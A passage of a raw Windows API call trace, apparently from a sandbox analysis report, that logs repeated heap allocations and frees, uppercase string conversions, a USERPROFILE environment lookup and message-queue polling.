Flags=0x0, Size=0xca) returned 0x24207f0 [0262.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0262.658] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0262.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0262.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0262.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ee8 [0262.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0262.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0262.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0262.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0262.658] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0262.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0262.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0262.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0262.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0262.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0262.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0262.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0262.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0262.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0262.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0262.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0262.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0262.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0262.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0262.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0262.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0262.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0262.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0262.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1198 [0262.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0262.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0262.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0262.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0262.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0262.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0262.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0262.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0262.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0262.660] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0262.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0262.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0262.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0262.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0262.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0262.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0262.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0262.661] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0262.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0262.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0262.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0262.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0262.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0262.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0262.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0262.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0262.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0262.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0262.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0262.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0262.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x2420898 [0262.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0262.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0262.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0262.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0262.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17d8 [0262.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0262.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0262.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0262.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0262.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c38 [0262.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0262.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0262.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0262.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ee8 [0262.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0262.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0262.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0262.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0262.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0262.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0262.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0262.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0262.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0262.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0262.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0262.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0262.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0262.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0262.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0262.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0262.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0262.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0262.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0262.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0262.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0262.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0262.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0262.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0262.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0262.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0262.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0262.664] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0262.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0262.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0262.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0262.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0262.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0262.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0262.665] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0262.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0262.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0262.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0262.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0262.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0262.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0262.665] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0262.665] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0262.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0262.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0262.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0262.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0262.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0262.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0262.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0262.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0262.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0262.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0262.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0262.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0262.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0262.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0262.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0262.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0262.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0262.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0262.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0262.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0262.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0262.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0262.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0262.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0262.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0262.667] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0262.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0262.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0262.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0262.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0262.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0262.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0262.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0262.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0262.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0262.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0262.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0262.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0262.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0262.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0262.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0262.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0262.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0262.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0262.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0262.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0262.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0262.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0262.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0262.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0262.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0262.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0262.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0262.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0262.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0262.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0262.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.669] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0262.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0262.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0262.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0262.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0262.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0262.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0262.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0262.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.670] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0262.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 